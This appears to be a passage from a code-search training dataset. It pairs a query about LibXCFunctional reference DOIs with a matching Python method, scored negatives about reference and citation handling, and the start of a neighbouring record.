full_name=expand_fn(remove_dunderscore_wrapper(match.group())),\n offset=match.start(),\n length=match.end() - match.start(),\n ) for match in re.finditer(DEPENDENCY_RE, unprefixed_bytecode)\n ))\n\n return link_references", "def get_references(subarray, filter='CLEAR', context='jwst_niriss_0134.imap'):\n # Accepted subarrays\n subarrays = ['SUBSTRIP96', 'SUBSTRIP256', 'FULL']\n if subarray not in subarrays:\n raise ValueError(\"{} is not a supported subarray. Please use {}\".format(subarray, subarrays))\n\n # Accepted filters\n filters = ['CLEAR', 'F277W']\n if filter not in filters:\n raise ValueError(\"{} is not a supported filter. Please use {}\".format(filter, filters))\n\n # F277W not yet supported. Just delete this line when F277W support is added to crds\n filter = 'CLEAR'\n\n params = {\"INSTRUME\": \"NIRISS\",\n \"READPATT\": \"NIS\",\n \"EXP_TYPE\": \"NIS_SOSS\",\n \"DETECTOR\": \"NIS\",\n \"PUPIL\": \"GR700XD\",\n \"DATE-OBS\": \"2020-07-28\",\n \"TIME-OBS\": \"00:00:00\",\n \"INSTRUMENT\": \"NIRISS\",\n \"FILTER\": filter,\n \"SUBARRAY\": subarray}\n\n # Default ref file path\n default_path = resource_filename('awesimsoss', 'files/refs/')\n\n # Collect reference files for subarray+filter combination\n try:\n import crds\n refs = crds.getreferences(params, context=context)\n except:\n\n refs = {'saturation': os.path.join(default_path, 'jwst_niriss_saturation_0010.fits'),\n 'photom': os.path.join(default_path, 'jwst_niriss_photom_0037.fits'),\n 'flat': os.path.join(default_path, 'jwst_niriss_flat_0190.fits'),\n 'gain': os.path.join(default_path, 'jwst_niriss_gain_0005.fits'),\n 'superbias': os.path.join(default_path, 'jwst_niriss_superbias_0120.fits'),\n 'dark': os.path.join(default_path, 'jwst_niriss_dark_0114.fits'),\n 'readnoise': os.path.join(default_path, 'jwst_niriss_readnoise_0001.fits'),\n 'linearity': os.path.join(default_path, 'jwst_niriss_linearity_0011.fits')}\n\n if subarray == 'SUBSTRIP96':\n refs['superbias'] = os.path.join(default_path, 'jwst_niriss_superbias_0111.fits')\n refs['dark'] = os.path.join(default_path, 'jwst_niriss_dark_0111.fits')\n\n if subarray == 'FULL':\n refs['gain'] = os.path.join(default_path, 'jwst_niriss_gain_0002.fits')\n refs['superbias'] = os.path.join(default_path, 'jwst_niriss_superbias_0029.fits')\n refs['dark'] = os.path.join(default_path, 'jwst_niriss_dark_0129.fits')\n\n # Check if reference files exist and load defaults if necessary\n for ref_name, ref_fn in refs.items():\n if not 'NOT FOUND' in ref_fn and not os.path.isfile(refs[ref_name]):\n refs[ref_name] = os.path.join(default_path, ref_fn)\n print(\"Could not get {} reference file from CRDS. Using {}.\".format(ref_name, ref_fn))\n\n return refs", "def show_refs(config, args):\n for item in lib.input_json_lines():\n yield config.repo.ref(item)", "def get_crossrefs(self):\n inter = self.get_interaction()\n crossrefs = {inter: inter.get_crossrefs()}\n crossrefs.update(self._economics.get_crossrefs())\n return crossrefs", "def __call__(self, text):\n return extract_references(text, self.preprocessor, self.model)", "def list_ref_keys(self):\n print('=======')\n print('REFs')\n print('=======')\n for key in self.refs:\n print(key)", "def _filter_references_section(self, text):\n references_pattern = r\"(REFERENCE)|(reference)|(Reference)\"\n references_found = [i.start() for i in re.finditer(references_pattern, text)]\n if references_found != []:\n last_reference_index = references_found[-1]\n return text[:last_reference_index]\n else:\n return text", "def hit_to_references( hit, predicate ):\n link = biopsy.transfac.TableLink( hit.binder )\n for f in link.entry.factors:\n g = f.link.entry.gene\n if None != g:\n for r in g.entry.db_refs:\n p = predicate( r )\n if p:\n yield p", "def extract_references(content):\n references = {}\n content = content.replace(\"\\n\", \"\\\\n\")\n matches = re.findall('(\\[[0-9]+\\][^\\[]*?(?=\\[|Acknowledge|Fig|Table|Conclusion|pdf))', content)\n if matches:\n for match in matches:\n ref_id = get_reference_id(match)\n # No reference id exist -- skip it\n if ref_id != -1:\n value = match.replace('\\\\n', '\\n')\n references[ref_id] = value\n return references", "def get(self, *args):\n return _libsbml.ListOfCompartmentReferences_get(self, *args)", "def get_references(caller, callee):\n function_manager = currentProgram.getFunctionManager()\n\n ref_list = []\n callee_symbol = callee.getSymbol()\n callee_references = callee_symbol.getReferences()\n\n for ref in callee_references:\n addr = ref.getFromAddress()\n func = function_manager.getFunctionContaining(addr)\n if func == caller:\n ref_list.append(addr)\n\n return ref_list", "def get_crossrefs(self):\n return self._crossrefs", "def getRefs(self):\n\n backend = self.backend\n refs = self.moduleRefs\n for ref in refs:\n refPure = ref.rsplit(\":\", 1)[0]\n if refPure in self.seen:\n continue\n\n parts = splitModRef(ref)\n if not parts:\n self.good = False\n continue\n\n parts[2] = prefixSlash(normpath(parts[2])) # the relative bit\n theBackend = (\n None if parts[-1] is None or parts[-1] == backend else parts[-1]\n )\n\n if not self.getModule(*parts[0:-1], backend=theBackend):\n self.good = False", "def get_handle_referents(self):\n return self.get_citation_child_list()", "def get_connector_references(context):\n\n catalog = plone.api.portal.get_tool('portal_catalog')\n query = dict(portal_type='xmldirector.connector')\n items = list()\n for brain in catalog(**query):\n items.append(SimpleTerm(brain.UID, brain.UID, brain.Title))\n items.sort(key=operator.attrgetter(\"title\"))\n return SimpleVocabulary(items)", "def getreferingobjs(idfindex, idfobject):\n idf, edges = eppystuff.an_idfedges(idfindex)\n refobjs = idfobject.getreferingobjs() \n keys = [refobj.key for refobj in refobjs] \n objnames = [refobj.obj[1] for refobj in refobjs] \n idfkeys = idf_helpers.idfobjectkeys(idf)\n keysobjsindexes = [(idfkeys.index(refobj.key.upper()), \n idf.idfobjects[refobj.key.upper()].index(refobj))\n for refobj in refobjs] \n urls = [\"../../%s/%s\" % (idfkey, objkey) \n for idfkey, objkey in keysobjsindexes]\n urllinks = ['<a href=%s>%s</a>' % (url, name) \n for url, name in zip(urls, objnames)]\n lines = [\"%s->%s\" % (refobj.key, urllink) \n for refobj, urllink in zip(refobjs, urllinks)]\n return ', '.join(lines)", "def _expand_ref(self, element): \n if element.tag == 'xref':\n target = element.attrib.get('target', '')\n format = element.attrib.get('format', self.defaults['xref_format'])\n item = self._getItemByAnchor(target)\n if not self.indexmode:\n if not item:\n xml2rfc.log.warn(\"Can't resolve xref target %s\" % target)\n else:\n item.used = True\n # Create xref from index lookup\n if not item:\n text = '[' + target + ']'\n elif format == 'none':\n text = ''\n elif format == 'counter':\n text = item.counter\n elif format == 'title':\n text = item.title.strip() if item.title else ''\n else:\n # Default\n text = item.autoName\n\n # following the V3 HTML -\n # If you specify text, that is what you get.\n if element.text:\n text = element.text.rstrip()\n \n a = E.A(href='#' + target)\n a.attrib[\"class\"] = \"xref\"\n a.text = text\n if element.tail:\n a.tail = element.tail\n \n return [a]\n\n elif element.tag == 'eref':\n target = element.attrib.get('target', '')\n if element.text:\n a = E.A(element.text, href=target)\n a.tail = element.tail\n return [a]\n else:\n sp1 = E.SPAN('<')\n a = E.A(target, href=target)\n sp2 = E.SPAN('>')\n sp2.tail = element.tail\n return [sp1, a, sp2]\n elif element.tag == 'cref':\n self.cref_counter += 1\n anchor = element.attrib.get('anchor', None)\n if anchor is None:\n anchor = 'CREF' + str(self.cref_counter)\n a = E.A('[' + anchor + ']', id=anchor)\n a.attrib['class'] = 'info'\n source = element.attrib.get('source', '')\n if source:\n source = source + \": \"\n b = E.SPAN(source + element.text)\n b.attrib['class'] = 'info'\n a.append( b )\n self._indexCref(self.cref_counter, anchor)\n if element.tail:\n a.tail = element.tail\n return [a]\n elif element.tag == 'iref':\n return self._add_iref_to_index(element)\n elif element.tag == 'spanx':\n style = element.attrib.get('style', self.defaults['spanx_style'])\n text = ''\n if element.text:\n text = element.text\n elem = None\n if style == 'strong':\n elem = E.STRONG(text)\n elif style == 'verb':\n elem = E.SAMP(text)\n else:\n # Default to style=emph\n elem = E.EM(text)\n if element.tail:\n elem.tail = element.tail\n return [elem]", "def get_references(cls, pmids):\n\n references = cls.query.filter(cls.pmid.in_(pmids)).all()\n citations = {}\n\n for reference in references:\n citation_text = reference.authors + \". (\" + str(\n reference.year) + \"). \" + reference.title + \" \" + reference.journal + \".\"\n citations[reference.pmid] = citation_text\n\n return citations", "def cite(silent=False):\n if silent is False:\n print(__cite__)\n else:\n return __bibtex__", "def get_short_crefs_from( ea ):\r\n\tret = []\r\n\txrf = get_first_cref_from( ea )\r\n\txrf2 = get_first_fcref_from( ea )\r\n\tif xrf != BADADDR and xrf != xrf2:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_cref_from( ea, xrf )\r\n\twhile xrf != BADADDR and xrf != xrf2:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_cref_from( ea, xrf )\r\n\treturn ret", "def get_short_crefs_to( ea ):\r\n\tret = []\r\n\txrf = get_first_cref_to( ea )\r\n\txrf2 = get_first_fcref_to( ea )\r\n\tif xrf != BADADDR and xrf != xrf2:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_cref_to( ea, xrf )\r\n\twhile xrf != BADADDR and xrf != xrf2:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_cref_to( ea, xrf )\r\n\treturn ret", "def collect_citation_metadata(\n metadata: dict, references: List[pybtex.database.Entry]\n) -> dict:\n # Author list\n citation_authors = []\n for author_tier in [\"Core\", \"Developers\", \"Contributors\"]:\n for author in metadata[\"Authors\"][author_tier][\"List\"]:\n family_names, given_names = author[\"Name\"].split(\", \")\n citation_author = {\n \"family-names\": family_names,\n \"given-names\": given_names,\n }\n if \"Orcid\" in author:\n citation_author[\"orcid\"] = (\n \"https://orcid.org/\" + author[\"Orcid\"]\n )\n if \"Affiliations\" in author and len(author[\"Affiliations\"]) > 0:\n citation_author[\"affiliation\"] = \" and \".join(\n author[\"Affiliations\"]\n )\n citation_authors.append(citation_author)\n # References in CITATION.cff format\n citation_references = [to_cff_reference(entry) for entry in references]\n return {\n \"cff-version\": \"1.2.0\",\n \"message\": (\n \"Please cite SpECTRE in any publications that make use of its code\"\n \" or data. Cite the latest version that you use in your\"\n \" publication. The citation for this version is listed below.\"\n ),\n \"title\": metadata[\"Name\"],\n \"url\": metadata[\"Homepage\"],\n \"repository-code\": \"https://github.com/\" + metadata[\"GitHub\"],\n \"version\": metadata[\"Version\"],\n \"date-released\": metadata[\"PublicationDate\"],\n \"doi\": metadata[\"Doi\"],\n \"authors\": citation_authors,\n \"keywords\": metadata[\"Keywords\"],\n \"license\": metadata[\"License\"],\n \"references\": citation_references,\n }", "def getXRefsFrom(self):\r\n # type: () -> (list[int], list[int])\r\n crefs = []\r\n drefs = []\r\n\r\n\r\n # normalFlow = True\r\n # for ref in idautils.CodeRefsFrom(self.func_ea, normalFlow): # XrefsFrom\r\n # crefs.append(ref)\r\n # for ref in idautils.CodeRefsFrom(self.func_ea, not normalFlow): # XrefsFrom\r\n # crefs.append(ref)\r\n # for ref in idautils.CodeRefsFrom(self.func_ea-1, normalFlow): # XrefsFrom\r\n # crefs.append(ref)\r\n # for ref in idautils.CodeRefsFrom(self.func_ea-1, not normalFlow): # XrefsFrom\r\n # crefs.append(ref)\r\n\r\n # needed to identify pool variables. drefs accessing the pool may access pointers\r\n # in the pool. the pointers should be retrieved instead\r\n size_pool = self.getSize(withPool=True)\r\n # for each instruction\r\n for i in idautils.FuncItems(self.func_ea):\r\n for xref in idautils.XrefsFrom(i, 0):\r\n # if the xref is to a far or near called function\r\n if xref.type == idc.fl_CN or xref.type == idc.fl_CF:\r\n if xref.to not in crefs:\r\n crefs.append(xref.to)\r\n # if the xref is to a read or write data access\r\n if xref.type == idc.dr_W or xref.type == idc.dr_R:\r\n if xref.to not in drefs:\r\n # if xref.to is in the pool, then retrieve content if it's a pointer\r\n if xref.to < self.func_ea + size_pool:\r\n # those are the references found at the pool location\r\n iteratedOnce = False\r\n for poolRef in idautils.XrefsFrom(xref.to, 0):\r\n if iteratedOnce:\r\n raise(FunctionException(\"%08X: there should only be one data xref in pool variable\"\r\n % (self.func_ea)))\r\n # there should only be one in the pool refernce\r\n if poolRef.to not in drefs:\r\n drefs.append(poolRef.to)\r\n iteratedOnce = True\r\n else:\r\n drefs.append(xref.to)\r\n\r\n # for ref in idautils.DataRefsFrom(self.func_ea):\r\n # drefs.append(ref)\r\n # for ref in idautils.DataRefsFrom(self.func_ea - 1):\r\n # drefs.append(ref)\r\n return crefs, drefs", "def list_ref0s(self):\n print('-----\\nREF0s\\n-----')\n self._print_dict(self.ref0s)", "def get_reference_list(reference_sequences_path):\n\n\ttry:\n\t\tinfile = open(reference_sequences_path, \"rU\")\n\t\tsequences = infile.read()\n\t\treference_sequences = sequences.splitlines()\n\t\tinfile.close()\n\t\treturn reference_sequences\n\texcept IOError as e:\n\t\tprint(str(e))\n\t\tsys.exit(1) # Aborts program. (exit(1) indicates that an error occurred)", "def get_all_references(alignedsegment):\n \n references = [alignedsegment.reference_name]\n \n # Some reads don't have secondary hits\n if not alignedsegment.has_tag('XA'):\n return references\n \n # XA is a string contigname1,<other info>;contigname2,<other info>; ...\n secondary_alignment_string = alignedsegment.get_tag('XA')\n secondary_alignments = secondary_alignment_string.split(';')[:-1]\n \n for secondary_alignment in secondary_alignments:\n references.append(secondary_alignment.partition(',')[0])\n \n return references", "def add_ref_tag(basicSeqs):\r\n\r\n formattedBasicSeqs=list(basicSeqs) \r\n for record in formattedBasicSeqs:\r\n record.id=record.id+'_Ref'\r\n record.name=record.name+'_Ref'\r\n record.description=record.description+'_Ref'\r\n return formattedBasicSeqs", "def get_report_item_references_url(references_node):\n references_urls = []\n for reference_node in list(references_node):\n for child in list(reference_node):\n if child.tag == 'URL':\n references_urls.append(child.text)\n return references_urls", "def ref_to_link(txt):\n text = txt.group(1) # because it was a match in a regular expression\n\n thecite, everythingelse = first_bracketed_string(text)\n thecite = thecite[1:-1] # strip curly brackets\n thecite = thecite.replace(\"\\\\\",\"\") # \\href --> href\n\n refs = thecite.split(\",\")\n ans = \"\"\n\n # print \"refs\",refs\n\n for ref in refs:\n ref = ref.strip() # because \\cite{A, B, C,D} can have spaces\n this_link = \"\"\n if ref.startswith(\"href\"):\n the_link = re.sub(r\".*{([^}]+)}{.*\", r\"\\1\", ref)\n click_on = re.sub(r\".*}{([^}]+)}\\s*\", r\"\\1\", ref)\n this_link = '{{ LINK_EXT(\"' + click_on + '\",\"' + the_link + '\") | safe}}'\n elif ref.startswith(\"doi\"):\n ref = ref.replace(\":\",\"\") # could be doi:: or doi: or doi\n the_doi = ref[3:] # remove the \"doi\"\n this_link = '{{ LINK_EXT(\"' + the_doi + '\",\"https://doi.org/' + the_doi + '\")| safe }}'\n elif ref.lower().startswith(\"mr\"):\n ref = ref.replace(\":\",\"\")\n the_mr = ref[2:] # remove the \"MR\"\n this_link = '{{ LINK_EXT(\"' + 'MR:' + the_mr + '\", '\n this_link += '\"http://www.ams.org/mathscinet/search/publdoc.html?pg1=MR&s1='\n this_link += the_mr + '\") | safe}}'\n elif ref.lower().startswith(\"arxiv\"):\n ref = ref.replace(\":\",\"\")\n the_arx = ref[5:] # remove the \"arXiv\"\n this_link = '{{ LINK_EXT(\"' + 'arXiv:' + the_arx + '\", '\n this_link += '\"http://arxiv.org/abs/'\n this_link += the_arx + '\")| safe}}'\n\n\n if this_link:\n if ans:\n ans += \", \"\n ans += this_link\n\n return '[' + ans + ']' + everythingelse", "def get_references(input, verbose=False):\n\n # TODO: Make this a class reference parser\n\n # *** These tags are mobile-site specific\n\n # When we don't have proper access rights, this is present in the html\n GUEST_TAG_TUPLE = (\"li\", {\"id\": \"menuGuest\"})\n\n # Entries are \"li\" tags with classes of the form:\n # article-reference-article\n # article-reference-other-ref\n REFERENCE_TAG_TUPLE = (\"li\", {\"class\": re.compile('article-reference-*')})\n\n # This is the URL to the page that contains the document info, including\n # reference material\n BASE_URL = _SD_URL + '/science/article/pii/'\n\n # This URL was found first via Fiddler, then via closer inspection of the script\n # 'article_catalyst.js' under sciencedirect.com/mobile/js in the function\n # resolveReferences\n REF_RESOLVER_URL = _SD_URL + '/science/referenceResolution/ajaxRefResol'\n\n # Return the BeautifulSoup result, the requests session, and the requests response\n if _is_url(input):\n pii = _extract_pii(input)\n else:\n pii = input\n\n sess = requests.Session()\n\n if verbose:\n print('Requesting main page for pii: %s' % pii)\n resp = sess.get(BASE_URL + pii, cookies={'Site': 'Mobile'})\n\n # Step 2 - Get the reference tags\n\n soup = BeautifulSoup(resp.text)\n\n reference_section = soup.find(\"ol\", {\"class\": \"article-references\"})\n\n if reference_section is None:\n # Then we might be a guest. In other words, we might not have sufficient\n # privileges to access the data we want. Generally this is protected via\n # IP mask. When I'm working from home I need to VPN into work so\n # that I can access the data :/\n print(\"reference_section is None\")\n temp = soup.find(*GUEST_TAG_TUPLE)\n if temp is None:\n # We might have no references ... (Doubtful)\n raise ParseException(\"References were not found ..., code error likely\")\n else:\n raise InsufficientCredentialsException(\n \"Insufficient access rights to get referencs, requires certain IP addresses (e.g. university based IP)\")\n\n ref_tags = reference_section.find_all(*REFERENCE_TAG_TUPLE)\n\n n_refs = len(ref_tags)\n\n if n_refs == 0:\n return None\n\n # Step 3 - Resolve reference links\n # --------------------------------------------------------------------------\n # The returned html code contains javascript which returns more information\n # about each reference, such as:\n #\n # - links to the full text\n # - DOI \n\n\n # Step 3.1 - Make the request for the information\n # --------------------------------------------------------------------------\n # We need the eid of the current entry, it is of the form:\n #\n # SDM.pm.eid = \"1-s2.0-0006899387903726\"\n #\n # * I think this entry gets deleted after the requests so it may not be\n # visible if looking for it in Chrome. \n match = re.search('SDM\\.pm\\.eid\\s*=\\s*\"([^\"]+)\"', resp.text)\n #eid = match.group(1)\n\n # This list comes from the resolveReferences function in article_catalyst.js\n payload = {\n '_pii': pii,\n '_refCnt': n_refs,\n '_docType': 'article', # yikes, this might change ...\n '_refRangeStart': '1',\n '_refRangeCount': str(n_refs)} # This is normally in sets of 20's ...\n # I'm not sure if it is important to limit this. The browser then\n # makes a request fromr 1 count 20, 21 count 20, 41 count 20 etc,\n # It always goes by 20 even if there aren't 20 left\n\n if verbose:\n print('Requesting reference links')\n r2 = sess.get(REF_RESOLVER_URL, params=payload)\n\n # Step 3.2 - Parse the returned information into single entries\n # --------------------------------------------------------------------------\n # This could probably be optimized in terms of execution time. We basically\n # get back a single script tag. Inside is some sort of hash map for links\n # for each reference.\n #\n # The script tag is of the form:\n # myMap['bibsbref11']['refHtml']= \"<some html stuffs>\"; \n # myMap['bibsbref11']['absUrl']= \"http://www.sciencedirect.com/science/absref/sd/0018506X7790068X\";\n # etc.\n #\n # - Each entry is quite long.\n # - Normally contains html\n # - can be empty i.e. myMap['bibsbref11']['refHtml'] = \"\";\n # - the refHtml is quite interesting\n # - the absolute url is not always present (and currently not parsed)\n more_soup = BeautifulSoup(r2.text)\n script_tag = more_soup.find('script')\n\n # We unquote the script text as it is transmitted with characters escaped\n # and we want the parsed data to contain the non-escaped text\n #\n # We might eventually want to move this to being after the regular expression ...\n script_text = urllib_unquote(script_tag.text)\n\n ref_match_result = re.findall(\"myMap\\['bibsbref(\\d+)'\\]\\['refHtml'\\]=\\s?\" + '\"([^\"]*)\";', script_text)\n # Tokens:\n # 0 - the # from bibsbref#\n # 1 - the html content from the 'refHtml' entry\n # \n # NOTE: We don't really use the #, so we might remove the () around\n # \\d+ which would shift the index from 1 to 0\n if verbose:\n print('Creating reference objects')\n\n if len(ref_match_result) > 0:\n zipped = zip(ref_tags, ref_match_result, range(n_refs))\n ref_objects = [ScienceDirectRef(ref_tag, ref_link_info[1], ref_id) for\n ref_tag, ref_link_info, ref_id in zipped]\n else:\n zipped = zip(ref_tags, range(n_refs))\n ref_objects = [ScienceDirectRef(ref_tag, ref_id) for\n ref_tag, ref_id in zipped]\n\n # Step 4:\n # --------------------------------------------------------------------------\n # TODO: Improve documentation for this step\n\n if verbose:\n print('Retrieving Scopus Counts')\n\n ref_scopus_eids = [] # The Scopus IDs of the references to resolve\n # but with a particular formatting ...\n ref_count = 0 # Number of references we haven't resolved\n\n ref_count_list = []\n # NOTE: Browser requests these in the reverse order ...\n for ref_id, ref in enumerate(ref_objects):\n\n if ref._data_sceid is not None:\n ref_scopus_eids.append(ref._data_sceid + ',' + str(ref_id + 1) + '~')\n ref_count += 1\n\n # If we've got enough, then update the counts\n # The 20 may be arbitrary but it was what was used in original JS\n if ref_count > 20:\n ref_count_list += _update_counts(sess, ref_scopus_eids, REF_RESOLVER_URL)\n ref_count = 0\n ref_scopus_eids = []\n\n # Get any remaining reference counts\n if ref_count != 0:\n ref_count_list += _update_counts(sess, ref_scopus_eids, REF_RESOLVER_URL)\n\n # Take the raw data and set the citation count for each object\n for ref_tuple in ref_count_list:\n ref_id = int(ref_tuple[0]) - 1\n ref_count = int(ref_tuple[1])\n ref_objects[ref_id].scopus_cite_count = ref_count\n\n # All done!\n # ---------\n return ref_objects", "def parse_ticket_references(text):\r\n return JIRA_RE.findall(text)", "def documentation_links(self):\n return self._documentation_links", "def fetchRefSeq(genome = 'hg18',lookupval = 'name'):\n cursor=gbdbConnect(gbdbname=genome)\n select=\"SELECT * FROM refGene\"\n cursor.execute(select)\n rows=cursor.fetchall()\n output={}\n for chr in genomelib.chr_names:\n output[chr]={}\n output[chr]['+']={}\n output[chr]['-']={}\n for row in rows:\n if row['chrom'] in genomelib.chr_names:\n output[row['chrom']][row['strand']][row[lookupval]]=row\n return output", "def refs_ii(self):\n return self._refs_ii", "def load_bib(bib_name):\n print(\"Reading BibTex File: {}\".format(bib_name))\n curdir = osp.abspath('.')\n bib_path = osp.join(curdir, bib_name)\n print(\"Path: {}\".format(bib_path))\n print('Creating library..')\n add_dir('library')\n with open(bib_path, 'r') as f:\n # txt = f.read()\n line = f.readline()\n i = 0\n start = False\n while line:\n i += 1\n if (line.find('@')==1) or start: # reading entry\n if start == False:\n filename = get_name(line)\n start = True\n if line.find('title')==1:\n link = get_link(line)\n if link is not None:\n savepath = osp.join(curdir, 'library', filename+'.pdf')\n save_pdf(link, savepath)\n if (line.find('}')==1): # end of entry\n start=False\n line = f.readline()\n print(i) # print line number" ]
[ "0.69096875", "0.63146305", "0.6111194", "0.6034255", "0.5903538", "0.5896246", "0.58946764", "0.58436126", "0.5805503", "0.5782022", "0.5763529", "0.5747076", "0.5733833", "0.57011646", "0.5679117", "0.56542027", "0.5642207", "0.56400794", "0.55577713", "0.55523235", "0.5548791", "0.5536262", "0.54992914", "0.54380506", "0.54347897", "0.5432711", "0.54304373", "0.5425337", "0.53915775", "0.53914505", "0.53538495", "0.53508687", "0.5349295", "0.5324914", "0.53219897", "0.5305879", "0.53050894", "0.5297182", "0.52593064", "0.52430576", "0.5240386", "0.52261496", "0.52075565", "0.52041805", "0.5196106", "0.518963", "0.51819885", "0.5178843", "0.5175414", "0.51667696", "0.51625204", "0.515936", "0.51348954", "0.5126413", "0.51196676", "0.51191366", "0.5101062", "0.5088137", "0.50783145", "0.5058605", "0.504729", "0.5046995", "0.50418586", "0.50322926", "0.50068533", "0.49948713", "0.49942032", "0.4987093", "0.49865916", "0.4984957", "0.49837178", "0.49834168", "0.49754965", "0.49750984", "0.49725375", "0.49584928", "0.49511915", "0.49410874", "0.49195287", "0.4907939", "0.49052498", "0.4899435", "0.48911375", "0.48802054", "0.48757562", "0.4874434", "0.48730758", "0.4850705", "0.48486063", "0.4843969", "0.4842659", "0.48381236", "0.4833999", "0.48201317", "0.48153853", "0.48134458", "0.48020083", "0.47993743", "0.47969073", "0.4779897" ]
0.5591979
18
Returns the LibXCFunctional reference DOIs.
def get_doi(self): return self._dois
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def list_defect_refs(self):\n print('-----------\\nDEFECT_REFs\\n-----------')\n self._print_dict(self.defect_refs)", "def list_refs(self):\n pass", "def references(self) -> \"IterableList[Reference]\":\n return Reference.list_items(self)", "def list_defect_ref_keys(self):\n print('=======')\n print('DEFECT_REFs')\n print('=======')\n for key in self.defect_refs:\n print(key)", "def getXRefsTo(self):\r\n # type: () -> (list[int], list[int])\r\n crefs = []\r\n drefs = []\r\n # If the current address is function process it\r\n if idc.get_func_flags(self.func_ea) != -1:\r\n # Find all code references to func\r\n ref = idc.get_first_cref_to(self.func_ea)\r\n while ref != idaapi.BADADDR:\r\n # name = get_func_name(ref)\r\n # if not name: name = \"ROM:%08X\" % ref\r\n crefs.append(ref)\r\n ref = idaapi.get_next_cref_to(self.func_ea, ref)\r\n # Find all data references to func\r\n for ref in idautils.DataRefsTo(self.func_ea):\r\n drefs.append(ref)\r\n for ref in idautils.DataRefsTo(self.func_ea + 1):\r\n drefs.append(ref)\r\n\r\n return crefs, drefs", "def GetExternRefs(*args):\n return _XCAFDoc.XCAFDoc_ShapeTool_GetExternRefs(*args)", "def XCAFDoc_ShapeTool_GetExternRefs(*args):\n return _XCAFDoc.XCAFDoc_ShapeTool_GetExternRefs(*args)", "def refs(self):\n return self._refs", "def get_refs(func):\n found = re.findall(\"References:(.*)\", func.__doc__, flags=re.DOTALL)\n if any(found):\n ref = \" \".join([s.strip() for s in found[0].split(\"\\n\")]).strip()\n return ref\n else:\n return \"\"", "def DOIs(self, default=[{}]):\n tmp = self.data.get('metadata', {}).get('dois', default)\n return [HEP.DOIObject(i) for i in tmp]", "def function_refs(self) -> List[FunctionReference]:\n return self._function_refs", "def getFileReferences():\n refNodes = pm.ls(rf=True)\n fileRefs = [r.referenceFile() for r in refNodes]\n return fileRefs", "def find_references(self):\n cls = self.__class__\n nodes = []\n for sobj in self._std.FindDependances(self.get_sobj()):\n nodes.append(cls(self._std, self._bld, sobj.GetID()))\n return nodes", "def get_references(self):\n\n return self._refs", "def find_references(doi):\n if doi is None:\n return None\n\n references = []\n if doi:\n response = requests.get(f\"https://opencitations.net/index/api/v1/references/{doi}\").json()\n if response:\n references = [{\"doi\": r['cited'].replace(\"coci =>\", \"\")} for r in response]\n\n if references:\n return references\n else:\n return None", "def get_all_refobjs(self, ):\n return cmds.ls(type=\"jb_reftrack\")", "def list_refs(self):\n print('----\\nREFs\\n----')\n self._print_dict(self.refs)", "def get_references(self):\n return self._references", "def get_short_crefs_from( ea ):\r\n\tret = []\r\n\txrf = get_first_cref_from( ea )\r\n\txrf2 = get_first_fcref_from( ea )\r\n\tif xrf != BADADDR and xrf != xrf2:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_cref_from( ea, xrf )\r\n\twhile xrf != BADADDR and xrf != xrf2:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_cref_from( ea, xrf )\r\n\treturn ret", "def _refs(self, items):\n # type: (Iterable[Any]) -> Iterable[weakref.ReferenceType]\n return map(self.ref, items)", "def get_short_crefs_to( ea ):\r\n\tret = []\r\n\txrf = get_first_cref_to( ea )\r\n\txrf2 = get_first_fcref_to( ea )\r\n\tif xrf != BADADDR and xrf != xrf2:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_cref_to( ea, xrf )\r\n\twhile xrf != BADADDR and xrf != xrf2:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_cref_to( ea, xrf )\r\n\treturn ret", "def refmodes(self):\n return self._refmodes", "def getDependencyList(self):\n return self.getDocumentedObject().getDependencyList()", "def documentation_links(self):\n return self._documentation_links", "def references(self):\n ref_nodes = self.root.xpath(\".//bib-reference\")\n return list(\n itertools.chain.from_iterable(\n self.get_reference_iter(node) for node in ref_nodes\n )\n )", "def list_all_refs(self):\n self.list_refs()\n self.list_ref0s()\n self.list_defect_refs()", "def DOIs(self, default=[None]):\n return self.data.get('dois', default)", "def registered_docs(self):\n return [t for t in self.registered if isinstance(t, dexy.doc.Doc)]", "def fetchReferences(self, dataRef, exposure):\n skyMap = dataRef.get(self.dataPrefix + \"skyMap\", immediate=True)\n tractInfo = skyMap[dataRef.dataId[\"tract\"]]\n patch = tuple(int(v) for v in dataRef.dataId[\"patch\"].split(\",\"))\n patchInfo = tractInfo.getPatchInfo(patch)\n references = lsst.afw.table.SourceCatalog(self.references.schema)\n references.extend(self.references.fetchInPatches(dataRef, patchList=[patchInfo]))\n return references", "def references_list( self, theWeaver ):\n return [ (c.name, c.seq) \n for c in theWeaver.reference_style.chunkReferencedBy( self ) ]", "def get_refs(self): \n for row in self._get_references_node():\n yield row.fetch_all_fields()", "def get_crossrefs(self):\n return self._crossrefs", "def get_crefs_from( ea ):\r\n\tret = []\r\n\txrf = get_first_cref_from( ea )\r\n\tif xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_cref_from( ea, xrf )\r\n\twhile xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_cref_from( ea, xrf )\r\n\treturn ret", "def getXRefsFrom(self):\r\n # type: () -> (list[int], list[int])\r\n crefs = []\r\n drefs = []\r\n\r\n\r\n # normalFlow = True\r\n # for ref in idautils.CodeRefsFrom(self.func_ea, normalFlow): # XrefsFrom\r\n # crefs.append(ref)\r\n # for ref in idautils.CodeRefsFrom(self.func_ea, not normalFlow): # XrefsFrom\r\n # crefs.append(ref)\r\n # for ref in idautils.CodeRefsFrom(self.func_ea-1, normalFlow): # XrefsFrom\r\n # crefs.append(ref)\r\n # for ref in idautils.CodeRefsFrom(self.func_ea-1, not normalFlow): # XrefsFrom\r\n # crefs.append(ref)\r\n\r\n # needed to identify pool variables. drefs accessing the pool may access pointers\r\n # in the pool. the pointers should be retrieved instead\r\n size_pool = self.getSize(withPool=True)\r\n # for each instruction\r\n for i in idautils.FuncItems(self.func_ea):\r\n for xref in idautils.XrefsFrom(i, 0):\r\n # if the xref is to a far or near called function\r\n if xref.type == idc.fl_CN or xref.type == idc.fl_CF:\r\n if xref.to not in crefs:\r\n crefs.append(xref.to)\r\n # if the xref is to a read or write data access\r\n if xref.type == idc.dr_W or xref.type == idc.dr_R:\r\n if xref.to not in drefs:\r\n 